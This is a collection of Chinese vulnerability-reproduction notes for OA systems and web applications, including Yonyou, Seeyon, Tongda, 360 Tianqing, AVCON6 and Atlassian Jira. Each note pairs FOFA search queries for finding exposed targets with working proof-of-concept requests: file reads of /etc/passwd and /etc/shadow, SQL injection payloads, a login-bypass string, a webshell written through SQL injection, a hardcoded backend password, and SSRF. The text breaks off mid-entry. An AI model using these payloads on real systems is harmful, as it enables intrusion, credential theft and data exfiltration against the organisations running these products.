![yongyou-4-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-2.png) -------------------------------------------------------------------------------- /OA产品漏洞/用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 用友 U8 OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "用友U8-OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520141805589](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201418731.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /yyoa/ext/https/getSessionList.jsp?cmd=getAll 29 | ``` 30 | 31 | ![image-20220520141832426](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201418464.png) -------------------------------------------------------------------------------- /OA产品漏洞/红帆OA ioFileExport.aspx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 红帆OA ioFileExport.aspx 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 红帆OA ioFileExport.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 红帆OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="红帆-ioffice" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520142002215](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201420294.png) 24 | 25 | 验证POC, 读取web.config文件 26 | 27 | ``` 28 | /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream 29 | ``` 30 | 31 | ![image-20220520142019955](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201420011.png) 32 | 33 | ``` 34 | /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream 35 | ``` 36 | 37 | ![image-20220520142034423](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201420478.png) -------------------------------------------------------------------------------- /OA产品漏洞/致翔OA msglog.aspx SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 致翔OA msglog.aspx SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致翔OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="致翔软件-致翔OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![image-20220520142109952](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201421236.png) 24 | 25 | 存在漏洞的文件为 `msglog.aspx`,涉及注入的参数为 user 26 | 27 | ``` 28 | /mainpage/msglog.aspx?user=1 29 | ``` 30 | 31 | SQLMap跑一下 32 | 33 | ``` 34 | sqlmap -u http://127.0.0.1/mainpage/msglog.aspx?user=1 -p user --batch 35 | ``` 36 | 37 | ![image-20220520142130999](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201421211.png) -------------------------------------------------------------------------------- /OA产品漏洞/致远OA A6 DownExcelBeanServlet 用户敏感信息泄露.md: -------------------------------------------------------------------------------- 1 | # 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 2 | 3 | ## 漏洞描述 4 | 5 | 致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致远OA A6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="致远A8+协同管理软件.A6" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问如下URL即可跳转下载用户信息文件 22 | 23 | ``` 24 | /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 25 | ``` 26 | 27 | ![image-20220520151947895](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201519045.png) -------------------------------------------------------------------------------- /OA产品漏洞/致远OA A6 config.jsp 敏感信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 致远OA A6 config.jsp 敏感信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 致远OA A6 config.jsp页面可未授权访问,导致敏感信息泄漏漏洞,攻击者通过漏洞可以获取服务器中的敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致远OA A6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="yyoa" && app="致远互联-OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520152551136](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201525328.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /yyoa/ext/trafaxserver/SystemManage/config.jsp 29 | ``` 30 | 31 | ![image-20220520152601778](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201526835.png) -------------------------------------------------------------------------------- /OA产品漏洞/致远OA A6 createMysql.jsp 数据库敏感信息泄露.md: -------------------------------------------------------------------------------- 1 | # 致远OA A6 createMysql.jsp 数据库敏感信息泄露 2 | 3 | ## 漏洞描述 4 | 5 | 致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致远OA A6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="致远A8+协同管理软件.A6" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 当访问如下URL时执行了SQL语句 `select *from mysql.user;` 进行查询并返回到页面中 22 | 23 | ``` 24 | /yyoa/createMysql.jsp 25 | /yyoa/ext/createMysql.jsp 26 | ``` 27 | 28 | ![image-20220520152725777](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201527828.png) 29 | 30 | ![image-20220520152737237](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201527304.png) -------------------------------------------------------------------------------- /OA产品漏洞/致远OA A6 initDataAssess.jsp 用户敏感信息泄露.md: -------------------------------------------------------------------------------- 1 | # 致远OA A6 initDataAssess.jsp 用户敏感信息泄露 2 | 3 | ## 洞描述 4 | 5 | 致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露 6 | 7 | 可以通过得到的用户名爆破用户密码进入后台进一步攻击 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | 致远OA A6 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="致远A8+协同管理软件.A6" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 访问下列URL泄露用户信息 24 | 25 | ``` 26 | http://xxx.xxx.xxx.xxx/yyoa/assess/js/initDataAssess.jsp 27 | ``` -------------------------------------------------------------------------------- /OA产品漏洞/致远OA A8 status.jsp 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 致远OA A8 status.jsp 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致远OA A8-m 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="A8-m" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问监控页面 22 | 23 | ``` 24 | /seeyon/management/status.jsp 25 | ``` 26 | 27 | ![image-20220520153340922](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533962.png) 28 | 29 | 后台密码为 WLCCYBD@SEEYON 30 | 31 | 登录后通过如下url获得一些敏感信息 32 | 33 | ``` 34 | /seeyon/management/status.jsp 35 | /seeyon/logs/login.log 36 | /seeyon/logs/v3x.log 37 | ``` 38 | 39 | ![image-20220520153355298](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201533377.png) 40 | 41 | ![image-20220520153408356](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534420.png) 42 | 43 | ![image-20220520153422315](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201534381.png) -------------------------------------------------------------------------------- /OA产品漏洞/致远OA webmail.do 任意文件下载 CNVD-2020-62422.md: -------------------------------------------------------------------------------- 1 | # 致远OA webmail.do 任意文件下载 CNVD-2020-62422 2 | 3 | ## 漏洞描述 4 | 5 | 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 致远OA A6-V5 11 | 致远OA A8-V5 12 | 致远OA G6 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | app="致远互联-OA" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 验证POC 24 | 25 | ``` 26 | /seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties 27 | ``` 28 | 29 | 在漏洞的OA 系统将会下载 `datasourceCtp.properties` 配置文件 30 | 31 | ![image-20220520153850024](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201538060.png) 32 | 33 | 更改参数 filePath 可下载其他文件 -------------------------------------------------------------------------------- /OA产品漏洞/通达OA v11.6 report_bi.func.php SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 通达OA v11.6 report_bi.func.php SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 通达OA v11.6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TDXK-通达OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![image-20220520154236968](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201542062.png) 24 | 25 | 发送请求包执行SQL语句 26 | 27 | ``` 28 | POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 29 | Host: 30 | User-Agent: Go-http-client/1.1 31 | Content-Length: 113 32 | Content-Type: application/x-www-form-urlencoded 33 | Accept-Encoding: gzip 34 | 35 | _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info& 36 | ``` 37 | 38 | ![image-20220520154246274](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201542313.png) -------------------------------------------------------------------------------- /OA产品漏洞/通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 通达OA v2014 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TDXK-通达OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 版本信息 22 | 23 | ![image-20220520154718609](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201547687.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 29 | ``` 30 | 31 | ![image-20220520154741599](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201547656.png) -------------------------------------------------------------------------------- /OA产品漏洞/通达OA v2017 video_file.php 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 通达OA v2017 video_file.php 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 通达OA v2017 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TDXK-通达OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 验证POC 22 | 23 | ``` 24 | /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php 25 | ``` 26 | 27 | ![image-20220715110910861](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151109936.png) -------------------------------------------------------------------------------- /OA产品漏洞/金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 金和OA C6 存在越权信息泄露漏洞,普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 金和OA C6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Jinher-OA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 使用普通用户登录 OA应用后台 22 | 23 | 访问的POC为 24 | 25 | ```plain 26 | http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330 27 | ``` 28 | 29 | - 注意 RY120330 需要为确定的其他的用户编号 30 | 31 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090135010.png) 32 | 33 | 泄露了部分的敏感信息 34 | 35 | ## 参考文章 36 | 37 | https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA -------------------------------------------------------------------------------- /OA产品漏洞/金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 金蝶OA Apusic应用服务器(中间件) 存在任意文件读取漏洞,攻击者通过漏洞可以获取目录下的文件信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 金蝶OA 9.0 Apusic应用服务器(中间件) 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Apusic-公司产品" && title=="欢迎使用Apusic应用服务器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220520142557418](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201425611.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /admin/protected/selector/server_file/files?folder=/ 29 | ``` 30 | 31 | ![image-20220520142704544](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201427636.png) -------------------------------------------------------------------------------- /OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 金蝶OA server_file 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 金蝶OA 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Kingdee-EAS" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录界面为 22 | 23 | 24 | 25 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144781.png) 26 | 27 | 漏洞POC 28 | 29 | ```plain 30 | /appmonitor/protected/selector/server_file/files?folder=/&suffix= 31 | 32 | # Windows服务器 33 | appmonitor/protected/selector/server_file/files?folder=C://&suffix= 34 | 35 | # Linux服务器 36 | appmonitor/protected/selector/server_file/files?folder=/&suffix= 37 | ``` 38 | 39 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144057.png) -------------------------------------------------------------------------------- /Web应用漏洞/1039家校通 万能密码绕过 CNVD-2020-31494.md: -------------------------------------------------------------------------------- 1 | # 1039家校通 万能密码绕过 CNVD-2020-31494 2 | 3 | ## 漏洞描述 4 | 5 | 北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。 6 | 7 | 北京1039科技发展有限公司驾校管理系统存在万能密码绕过漏洞,攻击者可利用该漏洞获取数据库信息。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | 1039家校通 v1.0 - v6.0 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="学员登录_1039家校通" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 管理员登录接口为 24 | 25 | ```plain 26 | /admin/Product/Comstye.aspx 27 | /Student/StudentLogin.aspx 28 | /Teacher/Index.aspx 29 | ``` 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101936922.png) 34 | 35 | 36 | 37 | 账号密码为如下即可登录 38 | 39 | ```plain 40 | user:peiqi 41 | pass:' or ''=' 42 | ``` 43 | 44 | 45 | 46 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101936366.png) -------------------------------------------------------------------------------- /Web应用漏洞/1039家校通 后台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # 1039家校通 后台任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。 6 | 7 | 北京1039科技发展有限公司驾校管理系统后台编辑器存在任意文件上传漏洞,攻击者可以通过抓包的方式得知webshell路径,导致服务器被入侵 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | 1039家校通 v1.0 - v6.0 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="学员登录_1039家校通" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 使用 **1039家校通 万能密码绕过 CNVD-2020-31494** 登录后台后找到编辑器页面 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101937753.png) 26 | 27 | 28 | 29 | Burp抓包上传 asp webshell木马 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101937083.png) 32 | 33 | 34 | 35 | 可以得知webshell地址,这里我使用的冰蝎默认马,使用冰蝎连接 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101937755.png) -------------------------------------------------------------------------------- /Web应用漏洞/360天擎 gettablessize 数据库信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 360天擎 越权访问/数据库信息泄露 2 | 3 | ## 漏洞描述 4 | 5 | 360天擎 存在未授权越权访问,造成敏感信息泄露 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 天擎 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | ```plain 16 | GET /api/dbstat/gettablessize HTTP/1.1 17 | ``` 18 | 19 | ![image-20220209200552429](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092005904.png) 20 | 21 | -------------------------------------------------------------------------------- /Web应用漏洞/360天擎 rptsvcsyncpoint 前台SQL注入.md: -------------------------------------------------------------------------------- 1 | # 360天擎 rptsvcsyncpoint 前台SQL注入 2 | 3 | ## 漏洞描述 4 | 5 | 天擎 存在SQL注入,攻击者可以通过漏洞上传木马 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 天擎 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="360新天擎" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | ```plain 22 | 注入写shell: 23 | https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;-- 24 | 25 | 26 | 利用过程: 27 | 1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 28 | 2. 通过注入点,创建一张表 O 29 | 3. 为 表O 添加一个新字段 T 并且写入shell内容 30 | 4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell) 31 | 5. 删除 表O 32 | ``` 33 | 34 | 35 | 36 | 使用命令 37 | 38 | ```plain 39 | sqlmap -u https://xxx.xxx.xxx.xxx:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL 40 | ``` 41 | 42 | 43 | 44 | ![image-20220209200650958](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092006296.png) 45 | 46 | -------------------------------------------------------------------------------- /Web应用漏洞/AVCON6 系统管理平台 download.action 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # AVCON6 系统管理平台 download.action 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | AVCON6 系统管理平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="AVCON-6" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101910735.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /download.action?filename=../../../../../../etc/passwd 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101910750.png) -------------------------------------------------------------------------------- /Web应用漏洞/AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | AVCON6 系统管理平台 org_execl_download.action存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | AVCON6 系统管理平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="AVCON-6" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101910822.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101910818.png) -------------------------------------------------------------------------------- /Web应用漏洞/Alibaba AnyProxy fetchBody 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # Alibaba AnyProxy fetchBody 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Alibaba AnyProxy < 4.0.10 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "anyproxy" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102008909.png) 24 | 25 | 26 | 27 | 验证POC为 28 | 29 | ```plain 30 | /fetchBody?id=1/../../../../../../../../etc/passwd 31 | ``` 32 | 33 | 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102008683.png) 36 | 37 | -------------------------------------------------------------------------------- /Web应用漏洞/Alibaba Canal config 云密钥信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # Alibaba Canal config 云密钥信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Alibaba Canal 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Canal Admin" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 验证漏洞的Url为 22 | 23 | ```plain 24 | /api/v1/canal/config/1/0 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102002400.png) 28 | 29 | 30 | 31 | 其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器 32 | 33 | 34 | 35 | 云密钥泄露参考: red.peiqi.tech 36 | 37 | 其中还含有默认口令 **admin/123456** 38 | 39 | 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102002074.png) -------------------------------------------------------------------------------- /Web应用漏洞/Appspace jsonprequest SSRF漏洞 CVE-2021-27670.md: -------------------------------------------------------------------------------- 1 | # Appspace jsonprequest SSRF漏洞 CVE-2021-27670 2 | 3 | ## 漏洞描述 4 | 5 | Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Appspace 6.2.4 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "Sign-in-to-Appspace-Core" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面为 22 | 23 | ![image-20220524140826821](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241408911.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://db0bx.2lfmar.yourdomain.xyz 29 | ``` 30 | 31 | ![image-20220524141221709](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241412770.png) -------------------------------------------------------------------------------- /Web应用漏洞/Atlassian Bitbucket 登录绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # Atlassian Bitbucket 登录绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Bitbucket Server > 4.8 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Log in - Bitbucket" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241429046.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /admin%20/mail-server 29 | /admin%20/db 30 | /admin%20/db/edit 31 | /admin%20/license 32 | /admin%20/logging 33 | /admin%20/server-settings 34 | /admin%20/authentication 35 | /admin%20/avatars 36 | ``` 37 | 38 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241429345.png) -------------------------------------------------------------------------------- /Web应用漏洞/Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086 2 | 3 | ## 漏洞描述 4 | 5 | Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Atlassian Jira Server/Data Center 8.4.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ATLASSIAN-JIRA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241424642.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /s/cfx/_/;/WEB-INF/web.xml 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241424545.png) 32 | 33 | 可读取敏感配置文件 34 | 35 | ``` 36 | WEB-INF/web.xml 37 | WEB-INF/decorators.xml 38 | WEB-INF/classes/seraph-config.xml 39 | META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties 40 | META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml 41 | META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 42 | META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties 43 | ``` 44 | 45 | -------------------------------------------------------------------------------- /Web应用漏洞/Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442 2 | 3 | ## 漏洞描述 4 | 5 | Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 远程攻击者可利用该漏洞访问Jira webroot中的文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Atlassian Jira < 7.13.4 11 | Atlassian Jira 8.00-8.0.4 12 | Atlassian Jira 8.1.0-8.1.1 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | app="ATLASSIAN-JIRA" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 登录页面 24 | 25 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241425263.png) 26 | 27 | 验证POC 28 | 29 | ``` 30 | /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 31 | ``` 32 | 33 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241425438.png) -------------------------------------------------------------------------------- /Web应用漏洞/Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449 2 | 3 | ## 漏洞描述 4 | 5 | Atlassian Jira 